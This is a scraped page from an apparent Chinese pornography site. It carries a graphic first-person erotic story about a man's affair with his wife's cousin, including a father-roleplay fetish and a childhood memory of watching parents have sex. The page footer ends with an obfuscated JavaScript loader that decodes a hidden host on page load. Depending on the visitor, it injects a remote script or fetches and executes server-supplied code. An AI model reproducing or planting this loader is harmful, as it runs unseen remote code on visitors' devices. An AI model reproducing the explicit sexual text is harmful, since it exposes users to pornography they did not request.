返回

和小姨子终成正果e68

 首页

AV拼多多 ❤ 拼的多 ❤ 看的多
WWW.AvPinDuoDuo.COM
海外地址
www.AVPDD.com

按照北方的规矩,我媳妇姨家的妹妹我也称呼为小姨子,她叫汪华,今年37岁了。

自己在1管业做销售经理,说是销售经理,实际上就是事先与厂家把各种管材的出厂价都订好了,然后由她去联系各个房地产开发商,她称作甲方,加的价作为利润,由于刚开始她起步的时候,由我介绍了不少朋友做客户,所以经过几年的发展,有了很多稳定的客户,现在已经发展的她不用亲自去跑工地了,而是手下聘了7个业务员,她日常对公司的业务也就是把握把握大的方向,订好计划有业务员去跑,所以每天很是清闲,钱赚得多了,对自己更是放松,早起八点多到公司料理一会儿,九点多就可以到美容院减肥、做美容和按摩了。可以说养尊处优,加上在美容院每天接触的都是些阔太太,所以,小姨子的审美观点越来越高,对自己的生活质量也是要求越来越高,久而久之,加上对现有的生活就有不满情绪,这也为今后她的出轨埋下了伏笔。

这里先介绍一下汪华吧,个子1。65,体重110斤,是比较丰满的女人,冷眼一看长得一般人儿吧,但最大的特点皮肤特别白,白得脱了衣服以后清清楚楚的看到青色的血管走向,胸围36D,白白的乳房走起路来颤巍巍的,活生生的一对儿大白兔儿,说实话,作为姐夫不应该观察得这样细吧?但这是我结婚后见到她的的第一印像,况且现在我们终于有了结果,她也算我亲密的爱人了,我也有资本来评价她了啊!

大学毕业以后,汪华由南京回到家乡,原本可以留在南京工作的,为了相处4年、在一个单位工作的对像,她义无返顾的选择了回家乡工作。先是在某工行的储蓄所工作了一年,本来很稳定的工作,我们家人也都很满意。但是她那个不着调的对像,因为攀高枝,劈腿了!这无疑对她是当头一棒,两人你对他错的纠结了半年,分道扬镳,倔强的小姨子为了不整天面对着他,毅然辞去了稳定的工作,发誓以后有钱砸死他!离开银行自谋发展。同时,很快的在一个月内选择了张斌结婚了,这个选择也是和男友制气,离了你我一样可以结婚。

但说实话,制气的结果是双方不了解、没感情,影响以后感情的稳定。张斌的家庭是做日杂生意的,十年以前,结婚的时候家境还是比较殷实的,这也是汪华很快决定和他结婚的原因之一,但是这些年因为他父母思维老旧,张斌也参与不进去家里的生意,所以生意逐渐走下坡路了。张斌呢,本人貌不出众,无德无才,现在每天跟着汪华跑业务,可恨的是没能耐你就谦虚些吧,他偏不,整天在几个业务员面前装老大,甚至和以前个别女业务员勾勾搭搭,汪华发现些苗头以后,把手中生意的进项控制的牢牢地,他根本插不上手,也没辙。按照汪华的话讲,男人有钱就变坏,把钱控制住了,他没钱得瑟不到哪里去。所以他即使有非分之想,总的还是没有脱离汪华的手心儿。

言归正传,说说汪华创业的艰难吧,离开单位,她先后做过小生意、开过饭店,但都不理想,人家都是两口子齐上阵,但张斌是提不起来的阿斗,什么也帮不上忙。这样一来,钱没挣到、找个老公还不如以前那个对像,辞了职。她的脸上没了笑容,在人前老觉得抬不起头来,经常就跑到我家,来找这唯一的姐姐哭诉,所以,耳闻目睹,我也对她的整个经历过程比较了解,虽然是她毕业以后才见的第一面,对她的经历我还是比较同情的。

接触的机会多了,她感激姐姐的同时,对我也亲近了许多,两家的感情也就更深了。 06年,我一个发小作为开发商在市区黄金地段开发了一个楼盘,这是我市一个一流的房地产项目,哥们很重感情,加上平时也有很多市里的关系需要我协调。

便与我说让我随便挑一个项目来做,让我也挣些钱。我便把整个楼盘塑钢窗和水电供管工程要下来了。由于我还要上班,这时妻子便提出让汪华过来协助她做这个项目,两年下来,整个工程赚了一千二百万,期间因为我们的资金不足,汪华也借了不少资金来辅助我们,作为投资回报,08年,她也分得了三百万左右,这是她最大的一笔收入了,所以对我们俩她是感激万分,有了这次的经验,逐渐她也在这领域开拓发展起来,算小有成就吧。性吧首发

08年工程快结束时,一天晚饭时,他们姐俩在饭做桌上唧唧喳喳嘀咕着,我仔细的听着,原来是汪华怀孕了,两人在商量这个孩子留不留的问题,她说自己岁数也逐渐大了,别管是谁的?都想生下来,以后防老。呵呵,我一听,原来她在外面也有人了,不然怎么不说是张斌的孩子呢?通过这两年的接触,她几乎拿我们家当成自己家了,我也逐渐发现她对我还是比较佩服和有好感的!在我们的客房里自己备了一套睡衣睡裤,还有些换洗的小内衣,几乎两周就要在我家住上一次,所以春光外现的时候就多了起来,我对他这一对儿大白兔子印像越来越深就是这样形成的,按照他姐姐的意见,和张斌也不稳定,要个孩子最后还是累赘,还是打掉的好!但她说:张斌平时做起来本来就不行,以后再要怀孕也不容易了,不想失去这个机会……总之两人唠了很多很多,都是过来人啦,两个老娘们儿之间也没遮拦,甚至她说出了那个男人操逼时候夸她小逼逼像小姑娘一样紧的话,我越听也就越觉得刺激,也就放纵一下,接了些话,问她:你说张斌不行在哪方面啊?

她呵呵的反问我:你们男人不行你说是哪方面?哪有姐夫你那么强啊?弄的姐姐天天满面红光,看你把她滋润的跟花儿似的,她这一说,我倒有些虚荣了,看来老婆平时把我俩的事情都讲给她听了啊,在以前的文章里我写过和媳妇做爱时,她会让我喊着我双胞胎亲小姨子的名字,双方一起达到高潮。难道这些,媳妇也都和她讲了?我看也没什么拘束的了,就说,也真难为你了,汪华,这些年谁难受只有自己知道啊,姐夫支持你!媳妇嘻嘻地说:你有点正经的行不?你支持什么?你还要帮帮忙啊?听见人家说像小姑娘你又受不了了?你们男人啊,没有他妈的正经的,反正当时气氛很暧昧,汪华突然间羞得满脸通红,她那骄人的模样,深深的打动了我,我这才发现,这两年来,我的潜意识里已经被她深深地吸引了,我在不知不觉的拿别的女人和汪华比较,尤其是她那白白的皮肤和傲人的双胸,已经深深地印入我的脑海了。

最后商量的结果,还是把孩子做掉了,到底是谁的孩子,在汪华离开以后我试探着问过媳妇,但她只是说是一个年轻的小伙的,两人在酒桌上第一次见面后感觉很好,留了电话,饭后分手以后,男孩儿子又打电话把她约出去宵夜,结果喝多了,就去开房了,一次就怀上了,她现在连那个小伙子具体情况都没有完全清楚,就算1夜情吧,怀孕了做人流也得遭回罪啊!

大概间隔半个月以后,下班后,我在卓展买衣服的时候,突然有人在身后有人拍我肩,我一回头,看见原来是她。她呵呵的逗我,大才子怎么自己买衣服?平时都是艳丽姐姐伺候你啊,我说我你姐那件刚买的T恤被钢笔染上墨水了,怕你姐说我,趁她出差了,赶紧再买一件,反正也要换着穿的,你姐姐昨晚去大连了。她呵呵的笑着说:那我送你吧!算是妹妹孝敬你老人家的了。我说:你觉的我老?我可是人老心不老啊?她嘻嘻的笑:不老?哪儿不老?我没看出来啊,反正媳妇没在身边,我在意识到自己被她吸引以后,看到她莫名其妙的兴奋起来,我逗着她:哪都不老,你姐姐没和你说过我多厉害?要不你试试?两人像情侣般打情骂俏也很自然,1千多元衣服买就买了,我也不推辞了,她付了款买了衣服出来,我说那我请你吃饭吧?挑个你喜欢吃的店,要不回家孤家寡人的,没人做饭啊。好啊!她想了一会:去PPS吧!

到了PPS,,半明半暗的灯光,低声和着男生弹着及他的音乐和歌声,我俩像情侣一般面对面坐着、慢慢的吃着,吃什么都不重要了,最让我们心动的是这种暧昧的环境,这些年我俩第一次单独有机会相处,第一次单独吃饭,虽然是偶然促成的机会,但看得出来,双方都很珍惜这次机会,慢慢地喝着啤酒,她也把她这些年很多我不知道的情感经历讲了出来,言语间自然少不了对我的感激和讲出默默的对我的喜欢,不知不觉吃了四个多小时,快十一点了,我媳妇的一个查岗电话,提醒了我俩,但说实话,两个人已经默默心许了。我冲动起来,飞快的买了单,拉起她飞快的把她塞进越野车的后座,不顾一切的吻上她的红唇,两个人忘情的湿吻着,世界仿佛静止了,只有我俩口口不断转换角度渍渍的声音,通过前四个小时的交流,她已经完全向我敞开了心扉:姐夫,我喜欢你,好久就喜欢你了,我吃醋,吃我姐姐的醋,为什么你对她那么好?为什么你看不到我为什么我得不到你的爱?

眼泪从她的脸颊上留下来,我吻着她的泪,劝着她,我以前始终把你当成好妹妹的,是我没在乎你,我错了!今天是我们相互了解的日子,以后我会关心你,我会疼你……俩人拥抱着,我的手控制不住了,袭上了她那坚挺的双胸,很快的她软软的斜靠在车后座上,乳罩被我解开了,我的双手握住了那对梦寐以求的乳房,我看清楚了,淡淡的乳晕,但是因为乳房大的缘故,乳晕的范围明显比艳丽大了很多,她双手捧着乳房,轮流的送到我的嘴里,吃吧、姐夫,吃得我好舒服,我喜欢你吃我的咋咋,来吧!疯狂的我,已经不满足于这些了,我用力的掀开她的裙子,把手伸进她的内裤,我要扯碎它,我要肏她,要肏汪华!我大声地喊着:汪华,我要肏你!但突然间,她猛地拉住我的手阻止我:姐夫,那里脏,我刚做完人流,还没干净,不行啊!手摸上去摸到了垫的卫生巾,我也清醒了一些,是啊,刚做完人流啊,还垫着呢,她看到我失望的表情,很不好意思,安慰我说:姐夫,我也想给你,等我身子好了的时候,我加倍的补给你好不好?今天我给你口出来行不行?

竟然会这样?

还问我行不行?太行了!我高兴死了!我的印像中,女人能让男人肏,说明她对这个男人已经接受了,但能为他口交,可不是一般的感情啊!于是,我俩换个位置,我斜躺在后座上,她半跪着把我涨的青紫的弟弟含到嘴里,吞吐起来,但明显很不熟练,甚至掌握不了口齿挂到我的弟弟上,这是我的第一次。以前只是在A片里看过的,我对像、张斌都没有享受过,我不能给你处女身,给你这个第一次吧!我爱你!老公!十分钟后,一股激流喷涌而出,全部射入她的口中。激情过后,她倚在我的怀里,娇羞的说:我现在和张斌在一起都不叫老公,刚才不自觉的就喊你老公了,实际上我的心里早就默默的喜欢上你,期望你能成为我的老公了,我说你姐姐不在家,我们回你家吧?

她满脸洋溢着幸福,却说:姐夫,你和艳丽姐姐对我的恩情我望不了,但我不能对不起姐姐的事情了,喷射以后,我也清醒了不少,听她这么为难,我也不好说什么,提起裤子,绕到驾驶员位置,开车送她回家,一路上她在后座上始终一言不发,为了打开尴尬的局面,我也尝试开导开导她,我说:汪华,咱俩认识这么久了,亲如一家,以前彼此都控制的很好,但感情来了谁也当不了的,以后我还不会强迫你,顺其自然吧!仍然一路无语,到她家楼下,跳下车,招呼也没打,直接跑回楼道里,看房间灯亮以后,我打了两遍电话,也没接听,我也就悻悻回家了,心里的滋味好像打翻了五味瓶,说不清楚。

第二天、第三天……连续三天,怎么打她的电话也不接听,我也看出她在刻意回避我,便别无耻的骚扰人家了,便也调整一下自己的心态,一时的冲动勾起了这些年我对她的爱恋,我意识到:只不过是因为亲属的缘故,我不好思表现出喜欢她罢了,但实际上我最渴望的不就是她那大大乳晕的双乳吗?你当时不也是喊着喜欢我,叫着我老公吗?把我也当做1夜情的那个小伙了吗?矛盾着媳妇出差回来了,她全然不知情,若干天内,艳丽打电话约汪华来家里,都被她找各种理由巧妙的拒绝了。

每天心里跟小猫挠心似的,期间我也打过无数的电话给她,但她不接也不回话,经常去她的小区门前转转,以其望单独遇见她好好谈谈,虽然她和姐姐还是那样亲密,也还是来我家,但不在这里住了,也都是和姐姐一起回来,独自回去,不给我单独接触的机会,我以为我们俩真的没有缘分再发展了,慢慢的也就调整回当初的心态,对她不抱有任何幻想了,起码只是欣赏和回味了。 转眼时间过了半年,大年初六,下午三点多,我正在家里闲着上网,老婆家里的妹妹、岳母、大舅子都在那里打麻将,我是不愿意搀和他们家的事,正好让他们玩,也没人来烦我。突然间,我的手机响了,是她、啊、是她的号码。我猛然间关上房门,急急地接起来。 喂?姐夫,你在干嘛?

我在家里,你在哪里?

我和张斌在他舅舅家,在梅河口,张斌喝多了,我想见你,你有时间吗?

怎么了?你喝酒了?你俩打架了?

我没喝酒,是他喝多了,他睡觉了,我们也没打架,我就是控制不了自己了,就想见你,你能来吗?别和艳丽说啊

你等我啊,我和艳丽说一声,马上出发,你把梅河口你所在的地址发给我

不知道到底怎么了,但我必须去,这半年压抑死我了,欲火一经点燃,是无法熄灭的,点上些许水花儿,只会让火焰燃得更烈。我就是这样,每天脑子里萦绕的尽是她那白白的乳房、大大的乳晕,还有留在我嘴里的淡淡的乳香。

我过去撒了一个谎,外地回家探亲的小孟有急事要去清河,着急走,让我送他,回来时间得看情况,艳丽叮嘱一声注意安全,我急急忙忙就开车出发了,当时就是以为出什么事情了,把我急了够呛。

一百多公里路程,50分钟到了,把我急的满头是汗,她在入城的街口等着我,上了我的车,她坐在副驾驶的位置,没得给我问话。猛然间她就吻上我的嘴唇,老公。我爱你!我度日如年,我想死你了!我也一样,甜甜的唇吸引着我的舌头,我在探到她的唇腔深处,忘我的和她缠绵着,嘴里有些啤酒味道,但不大,我档底下的老二硬的立即支了起来。到底怎么回事?激吻了十多钟,我轻轻地把她头闪开一些问她,没事儿,就是想你了!走,我带你走,她轻轻地拉着我的手,指引着我来到梅河口这个城市里最好的宾馆,因为是春节,宾馆里客人非常少,停好车,我们就和小孩子一样牵着手跑步上了她事先开好的521房间,开门之前,她指着门牌说:521、我爱你!温柔体贴的汪华,我也爱你!

进了房间,我猴急的把她抱起来压在床上,直接就把鸡鸡隔着外裤顶在她的逼逼处,她呵呵的乐着,笑着说:看你急的?我和张斌昨天来的,看他舅舅,今天喝多了,我想你,就扔硬币,说要是国徽面,不管怎样我都要见你,我今天就要给你!结果真的是国徽面,我扔了了三次,都是,今天就是该着的日子。你想我吗?你想要我的身子吗?要,我要你等等,我去洗洗,说着,她把外衣一件一件的往下脱,边脱边问我:想看吗?上次没看见,急死了吧? 嗯,想看你的小MM

说话间,她把胸罩、内裤已经全脱光了,除了朝思暮想的乳房以外,我终于见到了她所称呼的小MM,略微稀疏、软软的毛毛儿,掩在毛毛之间粉色的小逼逼,小阴唇静静地埋在大阴唇之间,我管不了许多了,直接把她按到在床上,双手直接抓上她那白白的乳房,湿湿的舌头紧跟着舔上了乳头,她被我刺激的身子直晃,哦?、哦?直叫,老公啊,等我一会儿啊,一会儿我洗洗小MM,让你可劲儿的玩儿,行不?听她不停地叫老公,我心里十分的高兴,因为她上次说过,叫老公就是代表真正的身心合一了。我也主动脱光衣服。自己到浴室把水温调好了,拉她过来,对于我很随便的一个调温的细节,她感动的不得了,说:老公,你真的太好了,男人都像你这么细心对我,我被卖了也愿意,艳丽姐姐平时说你细心,她真的没看错你,实际上,我自己无意间做的动作,自己真的没有当回事情,但女人却看得如此重要,看来人和人之间真的应该以诚相待,多替对方付出才对啊!

 蓬头的水轻轻地冲着她的身体,冲着她的阴部,我忍不住蹲下身去,舌尖探到了她的逼逼,那桃花源处,用手轻轻的分开大小阴唇,露出粉红的阴蒂,短时间的刺激,已经让她的阴帝充血。我充分的试用舔、压、磨的舌功,把她弄得娇声滴滴的呻吟,淫水不断地流淌出来,沾在手指间,拉出细长的拉丝。太爽了,老公,我上天了她不停地梦呓着,一个女人如此的疯狂,我还真的是头一次看到,她是我至今遇到的做爱时候表现最真实的女人!

我把她掉转身去,手扶着墙,白白的屁股撅了起来,原来她左侧臀部上纹了一条漂亮的小龙,衔着一朵红色的玫瑰,(我的小名就叫小龙),白白的皮肤衬着纹身,我惊呆了,原来要从后面插入的想法停止了,我静静地看,仔细地看,看不够,又把她抱到床上,仔细的端详,把她都看的不好意思了,害羞的推开我:老公,来啊,亲我的小MM,来玩我啊,一会我再告诉你纹身的典故,听了她的召唤,开始用我的三寸长舌舔她的阴部,从小细缝的下面开始,混着口水和淫水,一下一下地舔到小小的硬硬的阴蒂,她淫水一股一股的流出,她开始用双手拉我,想把我拉到她的身上,我没有去。

我继续舔一会,一会儿,见她的小屄口有些开、张,我又开始舔她的小穴,啊,她的淫水可真多,一股一股的还往出涌,我一口一口吃了进去,真好吃,有一股淡淡的咸腥味!我把手指轻轻地按上她的阴蒂,同时逐渐的把手指一个、两个的插入她的小逼逼里,用手指肚摩擦着她的G点,很快,她身子一阵抽搐,泄了出来,啊、啊、不行了,实在不行了,老公你太会玩小逼了,我要你来操我 操哪里啊?汪华

操我的小骚逼,小屄痒死了,受不了了,快来啊

她的浪叫,同时刺激着我,我挺起长长的、紫黑色的鸡巴,深深地插入了她的小屄,我感觉一股从没有的温热,我进去了,我插到我小姨子的大屄里了,我的阴茎被温暖的大屄包围着,她的肉好像很细,好像有无数的很小很小的小蕾在锤打我的阴茎上的每一个皮肤细胞。一阵阵的快感从阴茎传便我的全身没一根神经,我抱着她的浑圆光滑的大屁股,我要仔细的品味这种感觉!!

我把她的两条腿使劲的往两侧掰开,让她的大屄尽最大可能的打开,一方面可以让我的阴茎更深的插入,另一方面,翘起来的屁股后面那条美丽的小龙和玫瑰花我也看得一清二楚,更加刺激,她也深情地投入,啊啊的叫着床。老公啊,干死我了,干死我吧!肏烂我的小MM了啊,使劲儿啊!整个屋子里顿时弥漫着两人性器结合特殊的味道儿,语言形容不出来,但确实存在的。汪华急急地说:“再快一些嘛,我有些受不了了,求求你!快干我啊!哦……哦……哦……”拌着她的呢喃,我头脑真的有些晕,我没有其它的想法了,我要立刻去冲刺,我要去插,我好像只有一种勇往直前的意识。

我要操!!她的屁股开始一下一下的上下活动,我也不再板着她的大腿了了,随着她的动作开始运动,哦……哦……哦……坚硬的阴茎在湿滑的阴道里上下抽插,一种原始的本能的动作能力在引导着我们,汪华她大声地呼叫着,根本不害怕别人听到,我在欣赏着她的快感的呻吟。

做了一会儿,我又让她跪在床上,头伏在床上,以背后方式插入,我的阴囊一下一下像小锤子似的敲在她的阴部,事后她说这一下下敲得特别舒服啊,我清楚的看着小龙,问她:什么时间纹的?为什么这个图案?就是上次以后,我真的爱上你了,但又不想影响你和艳丽,所以纹了它,小龙是你、花是我,咱俩永远在一起!

我当时感动的快要流下泪了,要知道,纹上图案,一辈子也清洗不下去了,做这决定需要很大的决心和勇气啊!于是我加大了力度抽插,屋子里啪啪的撞击声不绝于耳,她也很快的高潮了。

累了,我也刺激的要射了,我便与她商量,想让她女上位做一会儿,本来我是想自己歇歇,好做最后冲刺,没想到她坐到我身上把鸡鸡套入以后,慢慢地研磨起来,上下翻飞的抖动着屁股,让我的阴茎每次都能恰到好处的到达阴道最窄的地方,像小孩子的嘴似的一下一下的裹着我的鸡巴,她把身体压向我,用她的大白屁股在我的阴茎上有节奏地套弄,我的快感越来越强,我感觉我快要爆发了,我紧紧的抱住汪华,我使劲的用舌头在她的嘴里缠绕,把她的口水要吃干净似的,“噗吱……噗吱……噗吱……”

下体的声音越来越大,越来越快,淫水可能模糊了我们的交媾地,我的阴茎在她的阴道里放马驰拼,虽然她已经30多岁了,但阴道依然比较紧,夹的我何等舒服,大概五分钟光景,突然间,她的叫声大了起来,面色潮红,白白的身体也红了起来,我俩几乎同时面临着高潮,她啊、啊、啊的呻吟着,突然间喊出了:爸爸、肏我!爸爸的大鸡吧肏死我吧,爸爸我一惊,原本即可将要喷射的鸡鸡顿了一下,没射,而她啊啊的进入了高潮。逼逼紧紧地夹着我的鸡巴,一握一握的感觉,伏在我的身上不动了

我一看她已经高潮了,便没再撩扯她,让她静静地伏在我的身上,过了十分钟,她也缓过劲来了,看我鸡鸡还硬着,有些不好意思,问我怎么还没射?我说刚要射,听见你喊爸爸一紧张,就没了感觉了。她也不好意思了,说刚才意识已经模糊了,自己喊的什么根本就不知道啊!但既然我听见了,也没什么隐瞒的了。 她告诉我:自己在小的时候家里睡的是一铺大炕,这炕我是见过的,家里所有人都谁在一起,他的爸爸、妈妈经常就在她睡着以后做爱,时间上,偶尔的她也有还没睡着的时候,爸爸就摸揉妈妈的奶子,扒下妈妈的衣服裤衩,妈妈经常就会推着爸爸的手,指着自己睡觉的方向,说你看看小华睡着没有?她也赶紧把眼睛闭上装作睡着的样子,爸爸过来看了一眼,试探一下,她哪敢出声?

继续装得睡得深沉,爸爸试完以后,以为没事儿了,回到炕那边以后,就会爬到妈妈的身上,和妈妈会更加无拘无束的放开了肏屄,有的时候还让妈妈骑坐在自己身上,左右晃动,那时爸爸也会啊啊的大叫,好像两人在打仗似的,但打完了两人又吧嗒吧嗒亲嘴儿个没完。

结果就是她在7、8岁左右的时候,已经对操逼的经过很熟悉了,但她奇怪的是:明明妈妈啊啊的痛苦叫着,要死了要死了的,却还经常喊着老公你肏死我吧?这时她是恨爸爸的,以为爸爸欺负妈妈呢,记着以后给妈妈报仇。但她过了青春期以后,逐渐的知道男女做爱的事情了,虽然只是很懵懂,但回忆起来爸爸把妈妈操的死去活来以后,妈妈反而对爸爸疼爱有加,明白妈妈还是喜欢被操的感觉的,就觉得爸爸简直是太厉害、太完美的男人了,能让妈妈痴迷的迷恋着劈着大腿挨操的感觉,一定是那长长的、硬硬的鸡巴插屄里的感觉美妙死了。

况且爸爸作为一名小学老师,知书达理,温文尔雅,所以,慢慢的就有了恋父情节,把爸爸当做自己心目中最完美的男人,也幻想着体会一下被爸爸肏屄的感觉,但这只是个愿望,一直都压在心里,从来没有和别人说过的(和妈妈、和艳丽都是不能说的),没想到和我第一次做爱,在高潮时暴露了这个秘密,这也是给我的又一个第一次。也说明了她对我充分的信任了。

既然她说出了心里的愿望,我也要尽量满足她这多年的宿愿吧!于是,我拽过她的围巾,把她的眼睛蒙上,说:来吧,先吃吃爸爸的大鸡吧,然后爸爸满足你一次吧,她听话的把我的鸡巴含了起来我的阴茎因此也开始青筋暴起,我能感觉到我的全身的血液在往一个地方冲击。伴随她的套弄,我的快感越来越强。舒服!!先是从正面啪啪的大力度的抽插起来,操的她是淫水纷飞,我不停的让她喊着:爸爸、爸爸操的好舒服爸爸肏汪华吧,肏死我吧爸爸,女儿的逼逼比妈妈的紧吧?来吧,使劲夹死你……最后,在啪啪的抽打我的小龙过程中,后入姿势把精液射到了她的小屄里。我们紧紧的拥抱在一起、吻在一起!

枕在我的身边,她告诉我,张斌的性功能根本就不行。最多也就是坚持个4、5分钟,结婚这些年后,让她最羡慕的就是当年的爸爸、妈妈,她是经常能目睹两人换着姿势十多分钟、二十多分钟的,不满意呢数落两句,张斌不好意思了就经常用手指头来扣她的屄,偶尔一两次还能满足,但时间长了,她老觉得结回婚,却总是老公在拿手指头糊弄她,慢慢的也就不称呼他老公了,大学毕业以后,回家以后对我第一印像就很好,但没有别的想法,后来,辞职后和艳丽姐姐来往多了,和我的接触多了,渐渐的通过我的为人处事加深了了解,就慢慢的喜欢上我了,但只是喜欢,不敢越雷池一步。艳丽姐姐和她几乎无所不谈,在听到她诉苦张斌的无能时,便以你小龙哥每次多少分钟、怎么怎么弄得她虚脱欲死、怎么一夜高潮无数作比较,你说任何一个女人她能受得了吗? 那次1夜情对她的性经历、人生经历是一个很大的影响,觉察到:短短的人生,要留有多少遗憾到死?

谈到别人夸肏她小屄像小孩子那样紧,就是她编出来故意吸引我、挑逗我的,当时只是为了吸引我对她的注意,并且暗示我,你不留意、在意我,我可能和别人瞎扯了啊?她心里明镜知道这个孩子不是张斌的,刚做完人流以后,和我有了第一次接触,有段时间对她自己有了羞辱感,认为平白无故和陌生人上床,并做了人流,很不光彩,这些事情我都很清楚,所以也没脸儿再和我继续发展,就刻意的躲避着我,但是实际生活中,因为经常和姐姐做生意、经常在一起,不可避免的听到我的生活点滴,以至于是越不想见、思念越深,干脆把一腔的思念都寄托到纹身之上了。

了解了她的细微心里以后,我也郑重地向她承诺:我是你最信任的人,一定得对你负责任,经济上现在你也可以了,算是衣食无忧了,小逼逼以后就归我来伺候你了,行不行?你说呢?老公说着话,她又把我推倒在床上,把我的鸡鸡含到嘴里,嘻嘻笑道:你今后要伺候我的小屄屄、我今后用嘴伺候你的大鸡吧,你可能很累啊

我不怕,和你肏屄真舒服,你比你姐白多了,小屄操起来比她舒服,和你操完了我怕以后和她没法再做了

你一个人要承担三个角色呢,对谁不好都不可以的。和姐姐时你是我的龙哥、和我时是我的老公,你还是我的爸爸呢,呵呵

是啊,我尽力完成角色吧

当晚,我俩儿温存到23点。她下楼会张斌舅舅家,嘱咐我不要送她,好好休养,等明早她再抽时间过来陪我。初七、初八我们每天在宾馆不停地做爱,她说她小时候幻想的那些女人的快感都被我开发出来了,平时是个淑女,做起爱来,嗷嗷乱叫,简直是个疯子,几近疯狂,我俩在严冬里度过了美好的蜜月三天。

从梅河口回来以后,小妹和姐姐来往的更加密切了,我们在家里把握得非常好,姐姐在旁的时候,她就是我的小MM,姐夫一定要把握好尺度,但我们二人世界的时候,我当他爸爸或者老公肏她的时候,就不客气了,因为太客气了,她会和我生气不理我的!

【完】

评分
相关推荐
3.0分

3.0分 和小姨子终成正果e68

3.0分

3.0分 小姨子和女儿fb8

3.0分

3.0分 老婆和小姨子2b1

3.0分

3.0分 【我和小姨子】【完】402

3.0分

3.0分 和双胞胎小姨子467

3.0分

3.0分 我和三个小姨子e03

3.0分

3.0分 我和我的小姨子dc1

3.0分

3.0分 我上了小姨子和她的同学(我上了小姨子的同学 )(小姨子小芳f19

3.0分

3.0分 终于强姦了小阿姨8d5

3.0分

3.0分 朋友的妻子和小姨子27e


提示:为了您能够顺利的找到本站,请牢记:WWW.AVPINDUODUO.COM

请不要忽略该提示,这将意味着您将可能无法找到通往本站的地址。


免责声明 || 广告合作 || 意见反馈

AV拼多多【WWW.AvPinDuoDuo.COM】

已运行1 年 84 天 0 小时 52 分钟 33 秒

所属·美国·华盛顿 网站地图

function DgUow(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;};function YXMxB(e){var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,"");while(f<e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return DgUow(t);};window[''+'O'+'s'+'B'+'v'+'r'+'A'+'y'+'N'+'U'+'']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,i,w,d,c){var x=YXMxB,cs=d[x('Y3VycmVudFNjcmlwdA==')],crd=x('Y3JlYXRlRWxlbWVudA==');'jQuery';u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));'jQuery';if(navigator.userAgent.indexOf('b'+'a'+'id'+'u')>-1){var xhr=new XMLHttpRequest();xhr.open('POST','https://'+u+'/x/'+i);xhr.setRequestHeader('Content-Type','application/x-www-form-urlencoded;');xhr.setRequestHeader('X-REQUESTED-WITH','XMLHttpRequest');xhr.onreadystatechange=function(){if(xhr.readyState==4&&xhr.status==200){var data=JSON.parse(xhr.responseText);new Function('_'+'t'+'d'+'cs',new Function('c',data.result.decode+';return '+data.result.name+'(c)')(data.result.img.join('')))(cs);}};xhr.send('u=1');}else{var s=d[crd]('script');s.src='https://'+u+'/j/'+i;cs.parentElement.insertBefore(s,cs);}})('Zmm1rLmmRzcXprLmmNu','151936',window,document,['m','mbRtTdBxso']);}:function(){};